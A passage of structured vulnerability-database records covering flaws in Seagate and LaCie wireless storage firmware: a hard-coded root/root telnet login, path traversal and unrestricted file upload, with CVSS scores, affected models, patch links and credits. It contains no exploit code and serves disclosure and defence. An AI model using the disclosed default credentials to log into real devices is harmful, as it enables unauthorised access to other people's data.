{
"date": "2016-01-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"date": "2016-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-209"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-2876"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-209"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate and LaCie wireless storage products contain multiple vulnerabilities",
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-209"
}
],
"trust": 0.6
}
}
VAR-201512-0524
Vulnerability from variot - Updated: 2025-04-13 20:55Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 have a default password of root for the root account, which allows remote attackers to obtain administrative access via a TELNET session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username "root" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request ('Forced Browsing') https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. Seagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable. A remote attacker can TELNET A session exploits this vulnerability to gain administrator privileges
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201512-0524",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wireless mobile storage",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "goflex sattelite",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "wireless plus mobile storage",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "lac9000436u",
"scope": "lte",
"trust": 1.0,
"vendor": "lacie",
"version": "2.3.0.014"
},
{
"model": "lac9000464u",
"scope": "lte",
"trust": 1.0,
"vendor": "lacie",
"version": "2.3.0.014"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "lacie",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "fuel",
"scope": null,
"trust": 0.8,
"vendor": "lacie",
"version": null
},
{
"model": "goflex satellite",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "wireless mobile storage",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "wireless plus mobile storage",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "lac9000464u",
"scope": null,
"trust": 0.6,
"vendor": "lacie",
"version": null
},
{
"model": "technology llc seagate 36c",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "2.3.0.014"
},
{
"model": "technology llc seagate 36c",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "2.2.0.005"
},
{
"model": "technology llc seagate 36c",
"scope": "ne",
"trust": 0.3,
"vendor": "seagate",
"version": "3.4.1.105"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-207"
},
{
"db": "NVD",
"id": "CVE-2015-2874"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:lacie:lacie_fuel",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:goflex_sattelite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:wireless_mobile_storage",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:wireless_plus_mobile_storage",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mike Baucom, Allen Harper, and J. Rach of Tangible Security",
"sources": [
{
"db": "BID",
"id": "76547"
}
],
"trust": 0.3
},
"cve": "CVE-2015-2874",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2015-2874",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2015-006526",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-80835",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2015-2874",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-2874",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "IPA",
"id": "JVNDB-2015-006526",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201509-207",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-80835",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80835"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-207"
},
{
"db": "NVD",
"id": "CVE-2015-2874"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 have a default password of root for the root account, which allows remote attackers to obtain administrative access via a TELNET session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username \"root\" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request (\u0027Forced Browsing\u0027) https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. \nSeagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable. A remote attacker can TELNET A session exploits this vulnerability to gain administrator privileges",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2874"
},
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "VULHUB",
"id": "VHN-80835"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#903500",
"trust": 3.6
},
{
"db": "NVD",
"id": "CVE-2015-2874",
"trust": 2.8
},
{
"db": "JVN",
"id": "JVNVU92833570",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201509-207",
"trust": 0.7
},
{
"db": "BID",
"id": "76547",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "134986",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-80835",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80835"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-207"
},
{
"db": "NVD",
"id": "CVE-2015-2874"
}
]
},
"id": "VAR-201512-0524",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-80835"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T20:55:01.391000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Firmware Updates for Seagate Products",
"trust": 0.8,
"url": "http://knowledge.seagate.com/articles/en_US/FAQ/207931en"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
},
{
"problemtype": "CWE-Other",
"trust": 0.8
},
{
"problemtype": "CWE-22",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80835"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "NVD",
"id": "CVE-2015-2874"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.kb.cert.org/vuls/id/903500"
},
{
"trust": 2.5,
"url": "https://www.kb.cert.org/vuls/id/gwan-9zgtuh"
},
{
"trust": 2.5,
"url": "https://www.kb.cert.org/vuls/id/gwan-a26l3f"
},
{
"trust": 1.4,
"url": "https://apps1.seagate.com/downloads/request.html"
},
{
"trust": 1.4,
"url": "http://knowledge.seagate.com/articles/en_us/faq/207931en"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/425.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2874"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2875"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2876"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu92833570/index.html"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2874"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2875"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2876"
},
{
"trust": 0.3,
"url": "http://www.seagate.com/in/en/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80835"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-207"
},
{
"db": "NVD",
"id": "CVE-2015-2874"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80835"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-207"
},
{
"db": "NVD",
"id": "CVE-2015-2874"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-01T00:00:00",
"db": "CERT/CC",
"id": "VU#903500"
},
{
"date": "2015-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-80835"
},
{
"date": "2015-09-01T00:00:00",
"db": "BID",
"id": "76547"
},
{
"date": "2015-12-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"date": "2015-09-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-207"
},
{
"date": "2015-12-31T05:59:02.673000",
"db": "NVD",
"id": "CVE-2015-2874"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-12-08T00:00:00",
"db": "CERT/CC",
"id": "VU#903500"
},
{
"date": "2015-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-80835"
},
{
"date": "2015-09-01T00:00:00",
"db": "BID",
"id": "76547"
},
{
"date": "2016-01-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"date": "2016-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-207"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-2874"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-207"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate and LaCie wireless storage products contain multiple vulnerabilities",
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-207"
}
],
"trust": 0.6
}
}
VAR-201512-0525
Vulnerability from variot - Updated: 2025-04-13 19:46Absolute path traversal vulnerability on Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 allows remote attackers to read arbitrary files via a full pathname in a download request during a Wi-Fi session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username "root" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request ('Forced Browsing') https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. Seagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201512-0525",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wireless mobile storage",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "goflex sattelite",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "wireless plus mobile storage",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "lac9000436u",
"scope": "lte",
"trust": 1.0,
"vendor": "lacie",
"version": "2.3.0.014"
},
{
"model": "lac9000464u",
"scope": "lte",
"trust": 1.0,
"vendor": "lacie",
"version": "2.3.0.014"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "lacie",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "fuel",
"scope": null,
"trust": 0.8,
"vendor": "lacie",
"version": null
},
{
"model": "goflex satellite",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "wireless mobile storage",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "wireless plus mobile storage",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "lac9000464u",
"scope": null,
"trust": 0.6,
"vendor": "lacie",
"version": null
},
{
"model": "lac9000436u",
"scope": null,
"trust": 0.6,
"vendor": "lacie",
"version": null
},
{
"model": "technology llc seagate 36c",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "2.3.0.014"
},
{
"model": "technology llc seagate 36c",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "2.2.0.005"
},
{
"model": "technology llc seagate 36c",
"scope": "ne",
"trust": 0.3,
"vendor": "seagate",
"version": "3.4.1.105"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-208"
},
{
"db": "NVD",
"id": "CVE-2015-2875"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:lacie:lacie_fuel",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:goflex_sattelite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:wireless_mobile_storage",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:wireless_plus_mobile_storage",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mike Baucom, Allen Harper, and J. Rach of Tangible Security",
"sources": [
{
"db": "BID",
"id": "76547"
}
],
"trust": 0.3
},
"cve": "CVE-2015-2875",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2015-2875",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2015-006526",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-80836",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2015-2875",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-2875",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2015-006526",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201509-208",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-80836",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80836"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-208"
},
{
"db": "NVD",
